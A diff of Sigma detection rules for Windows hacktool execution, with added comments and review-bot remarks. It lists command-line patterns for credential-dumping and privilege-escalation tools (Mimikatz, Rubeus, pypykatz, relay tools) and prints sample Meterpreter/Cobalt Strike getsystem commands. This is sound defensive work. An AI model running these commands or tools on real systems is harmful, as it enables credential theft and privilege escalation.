@@ -18,20 +18,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \KrbRelay.exe - - OriginalFileName: KrbRelay.exe + - NewProcessName|endswith: \KrbRelay.exe + - OriginalFileName: KrbRelay.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -spn ' - ' -clsid ' - ' -rbcd ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - shadowcred - clsid - spn selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - 'spn ' - 'session ' - 'clsid ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml index b98716555..8e1130aea 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml @@ -1,8 +1,7 @@ title: HackTool - KrbRelayUp Execution id: 12827a56-61a4-476a-a9cb-f3068f191073 status: test -description: Detects KrbRelayUp used to perform a universal no-fix local privilege - escalation in Windows domain environments where LDAP signing is not enforced +description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced references: - https://github.com/Dec0ne/KrbRelayUp author: Florian Roth (Nextron Systems) 
@@ -21,19 +20,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \KrbRelayUp.exe - - OriginalFileName: KrbRelayUp.exe + - NewProcessName|endswith: \KrbRelayUp.exe + - OriginalFileName: KrbRelayUp.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' relay ' - ' -Domain ' - ' -ComputerName ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' krbscm ' - ' -sc ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' spawn ' - ' -d ' - ' -cn ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml index eb8ad86df..d6fe8fcdf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml @@ -1,8 +1,7 @@ title: HackTool - LocalPotato Execution id: 6bd75993-9888-4f91-9404-e1e4e4e34b77 status: test -description: Detects the execution of the LocalPotato POC based on basic PE metadata - information and default CLI examples +description: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples references: - https://www.localpotato.com/localpotato_html/LocalPotato.html - https://github.com/decoder-it/LocalPotato @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \LocalPotato.exe + NewProcessName|endswith: \LocalPotato.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - .exe -i C:\ - -o Windows\ selection_hash_plain: diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml index 62fffff95..57e207368 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml @@ -1,8 +1,7 @@ title: Potential Meterpreter/CobaltStrike Activity id: 15619216-e993-4721-b590-4c520615a67d status: test -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service starting +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -23,22 +22,26 @@ detection: selection_img: ParentProcessName|endswith: \services.exe selection_technique_1: - CommandLine|contains|all: + # Examples: + # Meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1b (expanded env var): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + CommandLine|contains|all: - /c - echo - \pipe\ - CommandLine|contains: + CommandLine|contains: - cmd - '%COMSPEC%' selection_technique_2: - CommandLine|contains|all: + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + CommandLine|contains|all: - rundll32 - .dll,a - '/p:' filter_defender: - CommandLine|contains: MpCmdRun - condition: process_creation and (selection_img and 1 of selection_technique_* - and not 1 of filter_*) + CommandLine|contains: MpCmdRun + condition: process_creation and (selection_img and 1 of selection_technique_* and not 1 of filter_*) fields: - SubjectUserName - ComputerName 
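Review bot: The example labelled `CobaltStrike getsystem technique 1b (expanded env var)` in the new comment block under `selection_technique_1` is byte-identical to the `technique 1` example beneath it; both show `%COMSPEC% /c echo ... > \\.\pipe\...`, so the "expanded" variant is not actually illustrated. Presumably the 1b line was meant to show the resolved interpreter path in place of `%COMSPEC%`, which is the case the `cmd` entry in `CommandLine|contains` exists to catch, while the `'%COMSPEC%'` entry covers the unexpanded form. Either correct the 1b example to show the expanded form or drop the duplicate so the comment does not imply two distinct samples where there is one.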
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml index a8e920520..6c973d8b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml @@ -5,8 +5,7 @@ description: Detection well-known mimikatz command line arguments references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://tools.thehacker.recipes/mimikatz/modules -author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim - Shelton +author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton date: 2019/10/22 modified: 2023/02/21 tags: @@ -24,24 +23,24 @@ detection: EventID: 4688 Channel: Security selection_tools_name: - CommandLine|contains: + CommandLine|contains: - DumpCreds - mimikatz - selection_function_names: - CommandLine|contains: - - ::aadcookie - - ::detours - - ::memssp - - ::mflt - - ::ncroutemon - - ::ngcsign - - ::printnightmare - - ::skeleton - - ::preshutdown - - ::mstsc - - ::multirdp + selection_function_names: # To cover functions from modules that are not in module_names + CommandLine|contains: + - ::aadcookie # misc module + - ::detours # misc module + - ::memssp # misc module + - ::mflt # misc module + - ::ncroutemon # misc module + - ::ngcsign # misc module + - ::printnightmare # misc module + - ::skeleton # misc module + - ::preshutdown # service module + - ::mstsc # ts module + - ::multirdp # ts module selection_module_names: - CommandLine|contains: + CommandLine|contains: - 'rpc::' - 'token::' - 'crypto::' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml index 892450bbf..e45417232 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml @@ -1,8 +1,7 @@ title: HackTool - PCHunter Execution id: fca949cc-79ca-446e-8064-01aa7e52ece5 status: test -description: Detects suspicious use of PCHunter, a tool like Process Hacker to view - and manipulate processes, kernel options and other low level stuff +description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff references: - http://www.xuetr.com/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ @@ -26,12 +25,12 @@ detection: EventID: 4688 Channel: Security selection_image: - NewProcessName|endswith: + NewProcessName|endswith: - \PCHunter64.exe - \PCHunter32.exe selection_pe: - - OriginalFileName: PCHunter.exe - - Description: Epoolsoft Windows Information View Tools + - OriginalFileName: PCHunter.exe + - Description: Epoolsoft Windows Information View Tools selection_hashes: Hashes|contains: - SHA1=5F1CBC3D99558307BC1250D084FA968521482025 
@@ -43,18 +42,18 @@ detection: - SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C - IMPHASH=0479F44DF47CFA2EF1CCC4416A538663 selection_hash_values: - - md5: - - 228dd0c2e6287547e26ffbd973a40f14 - - 987b65cd9b9f4e9a1afd8f8b48cf64a7 - - sha1: - - 5f1cbc3d99558307bc1250d084fa968521482025 - - 3fb89787cb97d902780da080545584d97fb1c2eb - - sha256: - - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 - - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c - - Imphash: - - 444d210cea1ff8112f256a4997eed7ff - - 0479f44df47cfa2ef1ccc4416a538663 + - md5: + - 228dd0c2e6287547e26ffbd973a40f14 + - 987b65cd9b9f4e9a1afd8f8b48cf64a7 + - sha1: + - 5f1cbc3d99558307bc1250d084fa968521482025 + - 3fb89787cb97d902780da080545584d97fb1c2eb + - sha256: + - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 + - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c + - Imphash: + - 444d210cea1ff8112f256a4997eed7ff + - 0479f44df47cfa2ef1ccc4416a538663 condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml index 9c73bae6f..dc5e82e84 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml @@ -26,11 +26,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - /Create - powershell.exe -NonI - /TN Updater /TR - CommandLine|contains: + CommandLine|contains: - /SC ONLOGON - /SC DAILY /ST - /SC ONIDLE 
@@ -38,7 +38,7 @@ detection: ParentProcessName|endswith: - \powershell.exe - \pwsh.exe - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml index 5a7ddc933..b10d7c907 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml @@ -1,9 +1,7 @@ title: HackTool - PowerTool Execution id: a34f79a3-8e5f-4cc3-b765-de00695452c2 status: test -description: Detects the execution of the tool PowerTool which has the ability to - kill a process, delete its process file, unload drivers, and delete the driver - files +description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html @@ -23,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \PowerTool.exe - - \PowerTool64.exe - - OriginalFileName: PowerTool.exe + - NewProcessName|endswith: + - \PowerTool.exe + - \PowerTool64.exe + - OriginalFileName: PowerTool.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml index bc9ac5432..ef9989c69 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml 
@@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \purplesharp - - OriginalFileName: PurpleSharp.exe + - NewProcessName|contains: \purplesharp + - OriginalFileName: PurpleSharp.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - xyz123456.exe - PurpleSharp condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml index a69d3c914..371f69c0b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml @@ -1,9 +1,7 @@ title: HackTool - Pypykatz Credentials Dumping Activity id: a29808fd-ef50-49ff-9c7a-59a9b040b404 status: test -description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries - may attempt to extract credential material from the Security Account Manager (SAM) - database through Windows registry where the SAM database is stored +description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored references: - https://github.com/skelsec/pypykatz - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - live - registry - NewProcessName|endswith: + NewProcessName|endswith: - \pypykatz.exe - \python.exe condition: process_creation and selection 
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml index 7e407d8d6..710a2afa3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml @@ -19,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \QuarksPwDump.exe + NewProcessName|endswith: \QuarksPwDump.exe selection_cli: - CommandLine: + CommandLine: - ' -dhl' - ' --dump-hash-local' - ' -dhdc' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml index 170338471..124735e8e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml @@ -1,8 +1,7 @@ title: HackTool - RedMimicry Winnti Playbook Execution id: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b status: test -description: Detects actions caused by the RedMimicry Winnti playbook a automated - breach emulations utility +description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility references: - https://redmimicry.com/posts/redmimicry-winnti/ author: Alexander Rausch @@ -22,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - gthread-3.6.dll - \Windows\Temp\tmp.bat - sigcmm-2.4.dll - NewProcessName|endswith: + NewProcessName|endswith: - \rundll32.exe - \cmd.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml index f08aeb361..0c3aa127b 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml @@ -1,8 +1,7 @@ title: Potential SMB Relay Attack Tool Execution id: 5589ab4f-a767-433c-961d-c91f3f704db1 status: test -description: Detects different hacktools used for relay attacks on Windows for privilege - escalation +description: Detects different hacktools used for relay attacks on Windows for privilege escalation references: - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://pentestlab.blog/2017/04/13/hot-potato/ @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection_pe: - NewProcessName|contains: + NewProcessName|contains: - PetitPotam - RottenPotato - HotPotato @@ -39,22 +38,22 @@ detection: - \ntlmrelayx - \LocalPotato selection_script: - CommandLine|contains: + CommandLine|contains: - Invoke-Tater - ' smbrelay' - ' ntlmrelay' - 'cme smb ' - ' /ntlm:NTLMhash ' - Invoke-PetitPotam - - '.exe -t * -p ' - selection_juicypotato_enum: - CommandLine|contains: .exe -c "{ - CommandLine|endswith: '}" -z' - filter_hotpotatoes: - NewProcessName|contains: + - '.exe -t * -p ' # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG + selection_juicypotato_enum: # appears when JuicyPotatoNG is used with -b + CommandLine|contains: .exe -c "{ + CommandLine|endswith: '}" -z' + filter_hotpotatoes: # known goodware https://hotpot.uvic.ca/ + NewProcessName|contains: - HotPotatoes6 - HotPotatoes7 - - 'HotPotatoes ' + - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial' condition: process_creation and (1 of selection_* and not 1 of filter_*) falsepositives: - Legitimate files with these rare hacktool names 
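Review bot: The `'.exe -t * -p '` entry in `selection_script`, now annotated as the JuicyPotatoNG pattern, contains an unescaped `*`, which Sigma treats as a wildcard rather than a literal asterisk; as written the value matches any command line with arbitrary text between `.exe -t ` and ` -p `, which is considerably wider than the tool's literal `-t *` option the comment refers to. If the literal asterisk is intended, the entry should be `- '.exe -t \* -p '`; if the wildcard is deliberate, the comment should say so, since the current wording reads as a literal match. This may be a pre-existing looseness rather than something this commit introduced, but the new comment makes the intent explicit without fixing the escaping.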
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml index f491632c1..528ab7f70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml @@ -1,11 +1,10 @@ title: HackTool - Rubeus Execution id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 related: - - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 - type: similar + - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 + type: similar status: stable -description: Detects the execution of the hacktool Rubeus via PE information of command - line parameters +description: Detects the execution of the hacktool Rubeus via PE information of command line parameters references: - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html @@ -27,25 +26,25 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Rubeus.exe - - OriginalFileName: Rubeus.exe - - Description: Rubeus - - CommandLine|contains: - - 'asreproast ' - - 'dump /service:krbtgt ' - - dump /luid:0x - - 'kerberoast ' - - 'createnetonly /program:' - - 'ptt /ticket:' - - '/impersonateuser:' - - 'renew /ticket:' - - 'asktgt /user:' - - 'harvest /interval:' - - 's4u /user:' - - 's4u /ticket:' - - 'hash /password:' - - 'golden /aes256:' - - 'silver /user:' + - NewProcessName|endswith: \Rubeus.exe + - OriginalFileName: Rubeus.exe + - Description: Rubeus + - CommandLine|contains: + - 'asreproast ' + - 'dump /service:krbtgt ' + - dump /luid:0x + - 'kerberoast ' + - 'createnetonly /program:' + - 'ptt /ticket:' + - '/impersonateuser:' + - 'renew /ticket:' + - 'asktgt /user:' + - 'harvest /interval:' + - 's4u /user:' + - 's4u /ticket:' + - 'hash /password:' + - 'golden /aes256:' + - 'silver /user:' condition: process_creation and selection falsepositives: - Unlikely 
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml index 7238a5732..f038ccd00 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml @@ -1,8 +1,7 @@ title: HackTool - SafetyKatz Execution id: b1876533-4ed5-4a83-90f3-b8645840a413 status: test -description: Detects the execution of the hacktool SafetyKatz via PE information and - default Image name +description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name references: - https://github.com/GhostPack/SafetyKatz author: Nasreddine Bencherchali (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \SafetyKatz.exe - - OriginalFileName: SafetyKatz.exe - - Description: SafetyKatz + - NewProcessName|endswith: \SafetyKatz.exe + - OriginalFileName: SafetyKatz.exe + - Description: SafetyKatz condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml index a56af0f0b..0ccb9f9ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml @@ -19,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - - Company: SecurityXploded - - NewProcessName|endswith: PasswordDump.exe - - OriginalFileName|endswith: PasswordDump.exe + - Company: SecurityXploded + - NewProcessName|endswith: PasswordDump.exe + - OriginalFileName|endswith: PasswordDump.exe condition: process_creation and selection falsepositives: - Unlikely 
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml index dd7936043..42d77861a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml @@ -1,8 +1,7 @@ title: HackTool - PPID Spoofing SelectMyParent Tool Execution id: 52ff7941-8211-46f9-84f8-9903efb7077d status: test -description: Detects the use of parent process ID spoofing tools like Didier Stevens - tool SelectMyParent +description: Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent references: - https://pentestlab.blog/2020/02/24/parent-pid-spoofing/ - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks 
@@ -22,35 +21,35 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \SelectMyParent.exe - - CommandLine|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - ' -spawnto ' - - OriginalFileName|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - Description: SelectMyParent - - Imphash: - - 04d974875bd225f00902b4cad9af3fbc - - a782af154c9e743ddf3f3eb2b8f3d16e - - 89059503d7fbf470e68f7e63313da3ad - - ca28337632625c8281ab8a130b3d6bad - - Hashes|contains: - - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC - - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E - - IMPHASH=89059503D7FBF470E68F7E63313DA3AD - - IMPHASH=CA28337632625C8281AB8A130B3D6BAD + - NewProcessName|endswith: \SelectMyParent.exe + - CommandLine|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - ' -spawnto ' + - OriginalFileName|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - Description: SelectMyParent + - Imphash: + - 04d974875bd225f00902b4cad9af3fbc + - a782af154c9e743ddf3f3eb2b8f3d16e + - 89059503d7fbf470e68f7e63313da3ad + - ca28337632625c8281ab8a130b3d6bad + - Hashes|contains: + - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC + - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E + - IMPHASH=89059503D7FBF470E68F7E63313DA3AD + - IMPHASH=CA28337632625C8281AB8A130B3D6BAD condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml index 9caed7063..928749f52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml 
@@ -1,8 +1,8 @@
title: HackTool - SharpChisel Execution
id: cf93e05e-d798-4d9e-b522-b0248dc61eaf
related:
- - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5
- type: similar
+ - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5
+ type: similar
status: test
description: Detects usage of the Sharp Chisel via the commandline arguments
references:
@@ -22,8 +22,9 @@ detection:
EventID: 4688
Channel: Security
selection:
- - NewProcessName|endswith: \SharpChisel.exe
- - Product: SharpChisel
+ - NewProcessName|endswith: \SharpChisel.exe
+ - Product: SharpChisel
+ # See rule 8b0e12da-d3c3-49db-bb4f-256703f380e5 for Chisel.exe coverage
condition: process_creation and selection
falsepositives:
- Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml
index fdbf990ef..c07a377ce 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml
@@ -1,11 +1,10 @@
title: HackTool - SharpImpersonation Execution
id: f89b08d0-77ad-4728-817b-9b16c5a69c7a
related:
- - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94
- type: similar
+ - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94
+ type: similar
status: test
-description: Detects execution of the SharpImpersonation tool. Which can be used to
- manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
references:
- https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/
- https://github.com/S3cur3Th1sSh1t/SharpImpersonation
@@ -25,18 +24,18 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith: \SharpImpersonation.exe
- - OriginalFileName: SharpImpersonation.exe
+ - NewProcessName|endswith: \SharpImpersonation.exe
+ - OriginalFileName: SharpImpersonation.exe
selection_cli:
- - CommandLine|contains|all:
- - ' user:'
- - ' binary:'
- - CommandLine|contains|all:
- - ' user:'
- - ' shellcode:'
- - CommandLine|contains:
- - ' technique:CreateProcessAsUserW'
- - ' technique:ImpersonateLoggedOnuser'
+ - CommandLine|contains|all:
+ - ' user:'
+ - ' binary:'
+ - CommandLine|contains|all:
+ - ' user:'
+ - ' shellcode:'
+ - CommandLine|contains:
+ - ' technique:CreateProcessAsUserW'
+ - ' technique:ImpersonateLoggedOnuser'
condition: process_creation and (1 of selection_*)
falsepositives:
- Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml
index e3a3a52ca..a62cfe4d4 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml
@@ -1,8 +1,7 @@
title: HackTool - SharpLDAPmonitor Execution
id: 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541
status: test
-description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation,
- deletion and changes to LDAP objects.
+description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
references:
- https://github.com/p0dalirius/LDAPmonitor
author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,10 +17,10 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith: \SharpLDAPmonitor.exe
- - OriginalFileName: SharpLDAPmonitor.exe
+ - NewProcessName|endswith: \SharpLDAPmonitor.exe
+ - OriginalFileName: SharpLDAPmonitor.exe
selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- '/user:'
- '/pass:'
- '/dcip:'
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml
index c0ab1f1a0..874534778 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml
@@ -1,8 +1,7 @@
title: HackTool - SharPersist Execution
id: 26488ad0-f9fd-4536-876f-52fea846a2e4
status: test
-description: Detects the execution of the hacktool SharPersist - used to deploy various
- different kinds of persistence mechanisms
+description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
references:
- https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit
- https://github.com/mandiant/SharPersist
@@ -20,22 +19,22 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith: \SharPersist.exe
- - Product: SharPersist
+ - NewProcessName|endswith: \SharPersist.exe
+ - Product: SharPersist
selection_cli_1:
- CommandLine|contains:
+ CommandLine|contains:
- ' -t schtask -c '
- ' -t startupfolder -c '
selection_cli_2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' -t reg -c '
- ' -m add'
selection_cli_3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' -t service -c '
- ' -m add'
selection_cli_4:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ' -t schtask -c '
- ' -m add'
condition: process_creation and (1 of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml
index 89562b1b9..f8c2d14a4 100644
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml
